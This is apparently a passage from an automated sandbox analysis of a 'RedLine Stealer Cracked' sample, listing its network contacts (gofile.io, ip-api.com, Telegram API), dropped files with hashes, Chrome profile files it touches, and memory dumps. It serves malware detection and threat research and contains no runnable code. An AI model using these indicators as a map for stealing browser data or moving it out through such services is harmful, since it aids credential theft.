| US | 8.8.8.8:53 | 140.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | counter.yadro.ru | udp |
| US | 8.8.8.8:53 | mc.yandex.ru | udp |
| RU | 93.158.134.119:443 | mc.yandex.ru | tcp |
| RU | 88.212.201.204:443 | counter.yadro.ru | tcp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | mc.yandex.com | udp |
| US | 8.8.8.8:53 | 104.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.201.212.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.134.158.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | gofile.io | udp |
| FR | 51.38.43.18:443 | gofile.io | tcp |
| FR | 51.38.43.18:443 | gofile.io | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 151.80.29.83:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | 18.43.38.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.29.80.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s.gofile.io | udp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 142.250.178.10:443 | content-autofill.googleapis.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 210.242.75.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | store2.gofile.io | udp |
| FR | 45.112.123.239:443 | store2.gofile.io | tcp |
| FR | 45.112.123.239:443 | store2.gofile.io | tcp |
| US | 8.8.8.8:53 | 239.123.112.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
Files
\??\pipe\crashpad_4780_IEBGSBYLGTMUGJKT
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 1fcc352cf396cfc4b89a19fdb01c1152 |
| SHA1 | 45e223001cef35b013dc2f65761322af43b064a9 |
| SHA256 | 044f0ce96b5ae037cd4ad149d2d0043681f7ab11b5360c71224d88e93c53dbcd |
| SHA512 | 06490adb2c9833f539d246bbf61a71d2ba5477538f1d919a64f902f4630f56608432cd44bf52fa3518ce4fa58184b051272b1d1bd57dc681c01eb4e7cb29ec34 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\File System\000\t\Paths\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 2c1868426416b69610dbdb1e3a679ce6 |
| SHA1 | e93fc58b1d9f6e9ad01a7ab50664c7277e192db3 |
| SHA256 | bfd93ec46f155ac98536f89e99b1f3aaede9d3a5500bb0a08b6307bbb2bf7581 |
| SHA512 | da6dc98f69cd6be56a0e380cce3dad89729e8b80243bb2e803660e342ac0f1292e6adfe7b34f321f4fc5769500e7219e676d642d8480f97c8545d67d3b4f6917 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 7b66e6d92398a8280ab50d8d51ed5a95 |
| SHA1 | ee7eac81a2b18769557eca5051d1bbb8c77c8a2f |
| SHA256 | 46123f251f8f4099b4bd8df1db97d4e3d280feccace4a205220ce03de05b4ef9 |
| SHA512 | b0ed694ea7f9b8feecc3a068068c9adbe4f5c5af621c86b986ceb9ca0b0ee2251103ed2bfb922390b9abef797b6717ca61d06006d4581e593e8c055781c456e8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 5d747f2ed2d7ede4634c7967c38e5382 |
| SHA1 | b4baaa26b896004d6f1a3f075400f6f60ae51906 |
| SHA256 | c752401f705a6545b33382f510b800c18c3c702935949a27bbc2cfa7f885dbce |
| SHA512 | 6dfa405b00f0a84832defccdda164733e3d95cfe08cd250d0a0e68d522e1d11617658592a1b0bf9b0450e3defd560157b30805ea8173ac74c269eec6c5ed746c |
C:\Users\Admin\Downloads\RedLine Stealer Cracked.rar
| MD5 | 91c9fb11e1416d0d648628ec5026e132 |
| SHA1 | a29f4105d2cb1070dd1a4e6ae5f3e6e1a64bb011 |
| SHA256 | debd64db33a0cabd87b3869916023d982b5228bca6adfbb3e5e93b9b146a8f5a |
| SHA512 | 6abf14554e4c76dab4841d21c2bb0063393c900dbfa6dc191992e3398c9a177e4e2e7b68cbf73734c1b104a7e21abad652ed925230b388a400c43dd3a1294a50 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 18a739a14f208f4a9bc1e3610d56131f |
| SHA1 | ce8909ddfa0c25c2fb0e8263a857e00bfe1db284 |
| SHA256 | 468b9aedf74ff1429675227cca78794e192a7ae6082d28a91981041bbc25cc89 |
| SHA512 | 2fafce8904427d8710e7448e53093ceda3980f80d9b44d3d414c985501821c6a611f389096833edafb81f4372b8ad50601290e4ab65209f00da771b0da9470ca |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe57d5ed.TMP
| MD5 | 08da502fab9353b141940aa053b5c845 |
| SHA1 | fe010c6fb74aa879a6a7c586c7493d1d7a71f1ec |
| SHA256 | f99a7efb70891a2b6c8e781d19fd42bc78e7e57752896e9306c2346f94951dd4 |
| SHA512 | 6cca0985f24c9a5405a52a5e363b0ac8cc1c277519e9fc75bbcb80e3d86013d0049d5842901c1888d79c5a46c426801b11c712b11969798d61f221db5dc110dd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | b227892541500a2e0a1814394c59c637 |
| SHA1 | aad7d22a5a610ab4af99dcabe8e7f2e560b26b1d |
| SHA256 | 1b3c2168a74c31539909afdc8198cdfe6700a596c8afc1d6f1dd2fd5cb9c3f36 |
| SHA512 | 8c849b99c7528a38367b11ab7fd47f5bda5c14cda705bf9d63824f5fc5a99fb2b428d9f6153f68597c73181ca484477317fb83037e6e2ad0ecca5a7a8ad3aeac |
C:\Users\Admin\Downloads\RedLine Stealer Cracked\RedLine.MainPanel-cracked.exe
| MD5 | 93303a9651264375b138eda4afa94374 |
| SHA1 | e7eba98dd3a4f6062aaa4d8af45a09b3cc6bbc78 |
| SHA256 | 0b905118e9d4781720588e5519d5076b7fb023044b8f6bd4f51a1735e2788b61 |
| SHA512 | 81a3169a8b47adf47414d5e5b4f7627a7be99bcaece3c6db5f391ae7b81b513667df898d7e073cc2ba7e5af128b8f799cc5c2327a0f87e9f51cf3c8eed24892b |
C:\Users\Admin\AppData\Local\Temp\RedLine.MainPanel-cracked.exe
| MD5 | baf102927947289e4d589028620ce291 |
| SHA1 | 5ade9a99a86e5558e5353afa7844229ed23bdcd5 |
| SHA256 | a6d2d1ba6765e5245b0f62e37d9298e20c913c5a33912b98bd65a76fc5ab28ae |
| SHA512 | 973ecb034ba18a74c85165df743d9d87168b07539c8ef1d60550171bc0a5766a10b9e6be1425aea203be45b4175694a489ea1b7837faa3b1927ca019492ccd37 |
C:\Users\Admin\AppData\Local\Temp\GERDA-Êðèïò â zip.exe
| MD5 | 2842b6eb83c0c1086f8e5f1cb7ac445a |
| SHA1 | 02683dfc3fb935c724624ebaae6daf5f27d19cd6 |
| SHA256 | 07738a9f2d08827c8e5ca89dd2059f0c9dac2aca9cb40f76ab3bba4441eacc4e |
| SHA512 | fd6fd924fab22026327962e9e1957b302487fc78ab09339077092257923928cd4b26dd4485b5d9846c0495daea660aee8bbb08c59400de341a0bbd8c60ba12c8 |
memory/936-262-0x0000000000400000-0x0000000000C36000-memory.dmp
memory/3448-263-0x0000000000E80000-0x0000000000F24000-memory.dmp
memory/3448-267-0x0000000003250000-0x000000000325E000-memory.dmp
C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.pdb
| MD5 | 418dc008ef956465e179ec29d3c3c245 |
| SHA1 | 4960b2952c6cc8de2295f145c3a4526bf6d1a391 |
| SHA256 | 8c7e21b37540211d56c5fdbb7e731655a96945aa83f2988e33d5adb8aa7c8df1 |
| SHA512 | ad386b6cf99682d117dce3a38c37f45843ac87d9ad17608453c0dfe8dd2b74c0c19c46a35da8140dc3ffc61d2333d78ab1438723cfd74aac585c39f0f59542f2 |
C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe
| MD5 | 2d6ac27235e545727f1c543cbcb4c606 |
| SHA1 | 6163fc890a58102a47a8c799adb2e8ed0fa4536e |
| SHA256 | 615aa9b90fb40c052eea89f0b273ed0bc5a4ab218783d30f00ecd72d56b08a25 |
| SHA512 | 7336c57706f071b5a806baae01fe049976081e1f7643c4f61193f37d62192bd950e1712e9ee864e3bed9246361d46f9581b6314771242299c102e2e43ad2049a |
C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\Bunifu_UI_v1.52.dll
| MD5 | 5eca94d909f1ba4c5f3e35ac65a49076 |
| SHA1 | 3b9cb69510887117844464a2cc711c06f2c3bd19 |
| SHA256 | de0e530d46c803d85b8aeb6d18816f1b09cb3dafefb5e19fdfa15c9f41e0f474 |
| SHA512 | 257a33c748dfb617a7e2892310132fd4abf4384fb09c93a8ac3f609fd91353a4f3e326124ecc63b6041ac87cf4fcc17a8bdca312e0c851acd9c7a182247066ea |
memory/3448-272-0x0000000005BA0000-0x0000000005BDE000-memory.dmp
C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\GuiLib.dll
| MD5 | eaf9c55793cd26f133708714ed3a5397 |
| SHA1 | 1818aa718498f0810199eca2b91db300dc24f902 |
| SHA256 | 87cfc70bec2d2a37bcd5d46f9e6f0051f82e015ff96e8f2bc2d81b85f2632f15 |
| SHA512 | b793ae1155bd7be247b42c0fc1bc53e34cf69e802c0e365427322dac4b5cc68728d24255a717aaffa774b4551a6946c17106387cff4cfdb6ce638d8a4ecab4d9 |
C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\MetroSet UI.dll
| MD5 | f13dc3cffef729d26c4da102674561cf |
| SHA1 | 5f9abff0bdf305e33b578c22dada5c87b2f6f39c |
| SHA256 | d490c04e6e89462fd46099d3454985f319f57032176c67403b3b92c86ca58bcb |
| SHA512 | aa8699c5f608a10a577cb23715f761ee28922c4778f5ea8a5ec0a184e1143689fba5a08003fd5cbf3c7dd516eac1fddc8c3f9efa1d993ba1888e87b70190c08f |
C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\Mono.Cecil.dll
| MD5 | 7546acebc5a5213dee2a5ed18d7ebc6c |
| SHA1 | b964d242c0778485322ccb3a3b7c25569c0718b7 |
| SHA256 | 7744c9c84c28033bc3606f4dfce2adcd6f632e2be7827893c3e2257100f1cf9e |
| SHA512 | 30b3a001550dca88c8effc9e8107442560ee1f42e3d2f354cc2813ae9030bf872c76dc211fd12778385387be5937e9bf172ea00c151cab0bca77c8aafdd11f7d |
C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\Mono.Cecil.pdb
| MD5 | c0a69f1b0c50d4f133cd0b278ac2a531 |
| SHA1 | bcefbe60c18318f21ba53377a386733e9266c37d |
| SHA256 | a4f79c99d8923bd6c30efafa39363c18babe95f6609bbad242bca44342ccc7bb |
| SHA512 | c38b0b08e7d37f31ab4331fcc54033ec181dc399e39df602869846f53e3dc006425a81b7b08f352c5e54501e247657364dfc288085a7c1c552737d4db4f33406 |
C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\Newtonsoft.Json.dll
| MD5 | 6815034209687816d8cf401877ec8133 |
| SHA1 | 1248142eb45eed3beb0d9a2d3b8bed5fe2569b10 |
| SHA256 | 7f912b28a07c226e0be3acfb2f57f050538aba0100fa1f0bf2c39f1a1f1da814 |
| SHA512 | 3398094ce429ab5dcdecf2ad04803230669bb4accaef7083992e9b87afac55841ba8def2a5168358bd17e60799e55d076b0e5ca44c86b9e6c91150d3dc37c721 |
memory/3448-319-0x00000000061A0000-0x0000000006450000-memory.dmp
memory/3448-320-0x0000000005D50000-0x0000000005D6A000-memory.dmp
memory/3448-322-0x0000000005FD0000-0x0000000006062000-memory.dmp
memory/3448-321-0x0000000006A00000-0x0000000006FA4000-memory.dmp
memory/3448-323-0x00000000075D0000-0x0000000007BE8000-memory.dmp
memory/3448-324-0x0000000006550000-0x000000000655A000-memory.dmp
C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\System.Drawing.Pen.dll
| MD5 | 1d4e91345a76c90e0849c9389e66fe8c |
| SHA1 | 744393f64d9f95a987605ac14b721dbbc985901c |
| SHA256 | 1d820d1c1e9d661603cd32177fb128c9a6844fe2492b6fbb3120bd37553663b0 |
| SHA512 | e0c5fa5c9141e139d529b80058c1ff8fb252116076c57fbea106ee2500cb23d3a91b76f6348bc0bcf465acde510463352a960eefd29198f4068661342cbd28b8 |
memory/3448-317-0x0000000005EB0000-0x0000000005EF0000-memory.dmp
C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\stub.exe
| MD5 | d90f058e42618ed7cfecd1b0f2c7a2f7 |
| SHA1 | 6bc8f8b727164efd24972fabf82a0d74021d5e31 |
| SHA256 | 6ac42ca465daa12786270a6a6378413e8b85829ab024757d2f7e65edea9e5090 |
| SHA512 | 9166280987fd9e506fccd9a66e8731740cf5f993e8b3abff078a95f7c7f88b242640ea224762cd02f9237ded38ff5816c53331417b0e411c4a05c8c548059021 |
memory/3448-313-0x0000000005C20000-0x0000000005C2E000-memory.dmp
C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\RedLine.SharedModels.dll
| MD5 | bee2969583715bfa584d073ac8d98c42 |
| SHA1 | 37d1221ce6bb82e7ad08fd22bd13592815a23468 |
| SHA256 | 5f92db78e43986f063632fb2cfafdce73e5e7e64979900783ca9a00016933375 |
| SHA512 | 5c139b81a51477d8362be2bf72b9f2425d54ef67b4ad715fbe8aa11f8a57435abb7f23a7ecaee18611e559d1006c0df5dd3427b6e7c3caed38d8cffd79e4bb1c |
memory/3448-309-0x0000000005DA0000-0x0000000005DEA000-memory.dmp
C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\protobuf-net.dll
| MD5 | d16fffeb71891071c1c5d9096ba03971 |
| SHA1 | 24c2c7a0d6c9918f037393c2a17e28a49d340df1 |
| SHA256 | 141b235af8ebf25d5841edee29e2dcf6297b8292a869b3966c282da960cbd14d |
| SHA512 | 27fb5b77fcadbe7bd1af51f7f40d333cd12de65de12e67aaea4e5f6c0ac2a62ee65bdafb1dbc4e3c0a0b9a667b056c4c7d984b4eb1bf4b60d088848b2818d87a |
memory/3448-305-0x0000000005E00000-0x0000000005EB0000-memory.dmp
C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\Mono.Cecil.Rocks.pdb
| MD5 | 17e3ccb3a96be6d93ca3c286ca3b93dc |
| SHA1 | d6e2f1edc52bbef4d6d2c63c837a024d6483bbb3 |
| SHA256 | ca54d2395697efc3163016bbc2bb1e91b13d454b9a5a3ee9a4304012f012e5eb |
| SHA512 | 08c4fc7b9a7609aca8d1f7c7cd1b8c859c198d3d4e7cad012a6f9b5490afff04a330c46f3429d61e3a5570c82855deda64a0308b899f8e2f93f66ed50f7fad3b |
memory/3448-300-0x0000000005B90000-0x0000000005B9E000-memory.dmp
C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\Mono.Cecil.Rocks.dll
| MD5 | c8f36848ce8f13084b355c934fc91746 |
| SHA1 | 8f60c2fd1f6f5b5f365500b2749dca8c845f827a |
| SHA256 | a08c040912df2a3c823ade85d62239d56abaa8f788a2684fb9d33961922687c7 |
| SHA512 | 7c47f96e0e7dfaebb4dccf99fa0dda64c608634e2521798fd0d4c74eb2641c848fadad29c2cd26eb9b45acdfef791752959117a59e1f0913f9092e4662075115 |
C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\Mono.Cecil.Pdb.pdb
| MD5 | 8e07476db3813903e596b669d3744855 |
| SHA1 | 964a244772ee23c31f9e79477fbccfd8ed9437e6 |
| SHA256 | aa6469974d04cba872f86e6598771663bb8721d43a4a0a2a44cf3e2cd2f1e646 |
| SHA512 | 715e7f4979142a96b04f8cb2ffa4a1547cd509eb05cf73f0885de533d60fd43d0c5bba9c051871fd38d503cb61fe1a0ee24350f25d89476fbc3b794f0ff9998f |
memory/3448-295-0x0000000005C00000-0x0000000005C1C000-memory.dmp
C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\Mono.Cecil.Pdb.dll
| MD5 | 6cd3ed3db95d4671b866411db4950853 |
| SHA1 | 528b69c35a5e36cc8d747965c9e5ea0dc40323b8 |
| SHA256 | d67ebd49241041e6b6191703a90d89e68d4465adce02c595218b867df34581a3 |
| SHA512 | e8ae4caf214997cc440e684a963727934741fd616a073365fa1fc213c5ca336c12e117d7fa0d6643600a820297fc11a21e4ac3c11613fba612b90ebd5fc4c07e |
C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\Mono.Cecil.Mdb.pdb
| MD5 | 0ba762b6b5fbda000e51d66722a3bb2c |
| SHA1 | 260f9c873831096e92128162cc4dfcc5c2ba9785 |
| SHA256 | d18eb89421d50f079291b78783408cee4bab6810e4c5a4b191849265bdd5ba7c |
| SHA512 | 03496dce05c0841888802005c75d5b94ac5ca3aa88d754230b6f4619861e58c0492c814805cde104dc7071e2860ebc90a7fba402c65a0397fb519c57fca982f7 |
memory/3448-289-0x0000000005B80000-0x0000000005B90000-memory.dmp
C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\Mono.Cecil.Mdb.dll
| MD5 | dc80f588f513d998a5df1ca415edb700 |
| SHA1 | e2f0032798129e461f0d2494ae14ea7a4f106467 |
| SHA256 | 90cfc73befd43fc3fd876e23dcc3f5ce6e9d21d396bbb346513302e2215db8c9 |
| SHA512 | 1b3e57fbc10f109a43e229b5010d348e2786e12ddf48a757da771c97508f8f3891be3118ff3bb84c3fd6bfa1723c670541667cdbf2d14ea63243f6def8f038cc |
memory/3448-285-0x0000000005CF0000-0x0000000005D4A000-memory.dmp
memory/3448-281-0x0000000005C60000-0x0000000005CD4000-memory.dmp
C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\links.txt
| MD5 | 7e0b0f449c419bc5dce0a9ae1920c00c |
| SHA1 | f36d4c8d25b082811e54e4c07f66b09dffc7c981 |
| SHA256 | 2ca989920e2cd5c250be6fb5e0ef82ee45a77f2147e91d736562c110b5ec372e |
| SHA512 | af229aa9d53c197e66aea3a66d1bf210f4fe0a9bdf0c8e17e4c2b8e1951a68ee55dd859313f6872ba10b289752f390901b9301525bd0ff93079f5b0ce4cbaeb1 |
memory/3448-276-0x0000000005B60000-0x0000000005B72000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Anarchy.exe
| MD5 | 2bfedf6a805c0b09efcb38ff053e3e14 |
| SHA1 | c124c7b8be490c693a4a56bf8d28602036f3bd79 |
| SHA256 | 12d66ea2bae0257a2d3fe98014b54c2f63199e6a4a4fae2d56e034761ee18999 |
| SHA512 | b1dab7364d22f5b20c0364f83071f3ed474a06388d7d896d5eafc6f6262d225a023c72262bae0281cc0cc32a2c6386b4bc13936bda9584623ab437807f7601a9 |
memory/1884-358-0x00007FFAA1610000-0x00007FFAA1BF9000-memory.dmp
memory/1884-360-0x00007FFABB1A0000-0x00007FFABB1AF000-memory.dmp
memory/1884-359-0x00007FFAB5510000-0x00007FFAB5533000-memory.dmp
memory/1884-365-0x00007FFAB4C70000-0x00007FFAB4C9D000-memory.dmp
memory/1884-366-0x00007FFAA3FB0000-0x00007FFAA3FC9000-memory.dmp
memory/1884-368-0x00007FFAA32E0000-0x00007FFAA3457000-memory.dmp
memory/1884-367-0x00007FFAA3460000-0x00007FFAA3483000-memory.dmp
memory/1884-369-0x00007FFAA3E80000-0x00007FFAA3E99000-memory.dmp
memory/1884-372-0x00007FFAA32A0000-0x00007FFAA32D3000-memory.dmp
memory/1884-371-0x00007FFAB5B20000-0x00007FFAB5B2D000-memory.dmp
memory/1884-370-0x00007FFAA1610000-0x00007FFAA1BF9000-memory.dmp
memory/1884-373-0x00007FFAA2F90000-0x00007FFAA305D000-memory.dmp
memory/1884-374-0x00007FFAA10F0000-0x00007FFAA1610000-memory.dmp
memory/1884-375-0x0000022B9C800000-0x0000022B9CD20000-memory.dmp
memory/1884-377-0x00007FFAA3E10000-0x00007FFAA3E24000-memory.dmp
memory/1884-378-0x00007FFAB57C0000-0x00007FFAB57CD000-memory.dmp
memory/1884-376-0x00007FFAB5510000-0x00007FFAB5533000-memory.dmp
memory/1884-379-0x00007FFAA2E70000-0x00007FFAA2F8C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ofdduuih.40q.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4436-389-0x000001FFAC370000-0x000001FFAC392000-memory.dmp
memory/4696-476-0x0000024E25880000-0x0000024E25888000-memory.dmp
memory/5064-475-0x0000020523DF0000-0x00000205248B1000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 5d8dc75b0698da2a85629963fdf4394b |
| SHA1 | 81d04fda794ba90dd7b1bf1c0e50d51447a93853 |
| SHA256 | 6a8dda63a93b71ad6e55c98f357d42bc78d82ff7bfa6339731e29cec4f882add |
| SHA512 | 850990450b4ed6d8befff1871a29bc2bc809d42049b95b259174087550725bdfa4d321f47353763180b86710070e59418f509c4c87f4c4e4562e24a51526d79b |
memory/1884-551-0x00007FFAA3460000-0x00007FFAA3483000-memory.dmp
memory/3448-563-0x0000000007E50000-0x0000000007E62000-memory.dmp
memory/3448-564-0x00000000080F0000-0x000000000812C000-memory.dmp
memory/3448-565-0x000000000A7E0000-0x000000000A82C000-memory.dmp
memory/3448-566-0x000000000B320000-0x000000000B42A000-memory.dmp
memory/3448-568-0x000000000B290000-0x000000000B2E0000-memory.dmp
memory/3448-567-0x000000000B210000-0x000000000B238000-memory.dmp
memory/1884-579-0x00007FFAA32E0000-0x00007FFAA3457000-memory.dmp
memory/1884-580-0x00007FFAA1610000-0x00007FFAA1BF9000-memory.dmp
memory/1884-595-0x00007FFAA3E80000-0x00007FFAA3E99000-memory.dmp
memory/1884-590-0x00007FFAA2F90000-0x00007FFAA305D000-memory.dmp
memory/1884-589-0x00007FFAA32A0000-0x00007FFAA32D3000-memory.dmp
memory/1884-581-0x00007FFAB5510000-0x00007FFAB5533000-memory.dmp
memory/1884-591-0x00007FFAA10F0000-0x00007FFAA1610000-memory.dmp
memory/4600-598-0x0000026F0FE20000-0x0000026F0FE21000-memory.dmp
memory/4600-597-0x0000026F0FE20000-0x0000026F0FE21000-memory.dmp
memory/4600-596-0x0000026F0FE20000-0x0000026F0FE21000-memory.dmp
memory/4600-603-0x0000026F0FE20000-0x0000026F0FE21000-memory.dmp
memory/4600-608-0x0000026F0FE20000-0x0000026F0FE21000-memory.dmp
memory/4600-607-0x0000026F0FE20000-0x0000026F0FE21000-memory.dmp
memory/4600-606-0x0000026F0FE20000-0x0000026F0FE21000-memory.dmp
memory/4600-605-0x0000026F0FE20000-0x0000026F0FE21000-memory.dmp
memory/4600-604-0x0000026F0FE20000-0x0000026F0FE21000-memory.dmp
memory/4600-602-0x0000026F0FE20000-0x0000026F0FE21000-memory.dmp
memory/1884-609-0x0000022B9C800000-0x0000022B9CD20000-memory.dmp
memory/1884-626-0x00007FFAB5510000-0x00007FFAB5533000-memory.dmp
memory/1884-625-0x00007FFABB1A0000-0x00007FFABB1AF000-memory.dmp
memory/1884-620-0x00007FFAA2F90000-0x00007FFAA305D000-memory.dmp
memory/1884-624-0x00007FFAA2E70000-0x00007FFAA2F8C000-memory.dmp
memory/1884-634-0x00007FFAA1610000-0x00007FFAA1BF9000-memory.dmp
memory/1884-632-0x00007FFAA3E80000-0x00007FFAA3E99000-memory.dmp
memory/1884-633-0x00007FFAB5B20000-0x00007FFAB5B2D000-memory.dmp
memory/1884-631-0x00007FFAA32A0000-0x00007FFAA32D3000-memory.dmp
memory/1884-630-0x00007FFAA3460000-0x00007FFAA3483000-memory.dmp
memory/1884-621-0x00007FFAA10F0000-0x00007FFAA1610000-memory.dmp
memory/1884-629-0x00007FFAA3FB0000-0x00007FFAA3FC9000-memory.dmp
memory/1884-628-0x00007FFAB4C70000-0x00007FFAB4C9D000-memory.dmp
memory/1884-623-0x00007FFAB57C0000-0x00007FFAB57CD000-memory.dmp
memory/1884-622-0x00007FFAA3E10000-0x00007FFAA3E24000-memory.dmp
memory/1884-627-0x00007FFAA32E0000-0x00007FFAA3457000-memory.dmp
memory/2296-636-0x0000000000DE0000-0x0000000000DEE000-memory.dmp
memory/2296-637-0x000000001C470000-0x000000001C4CA000-memory.dmp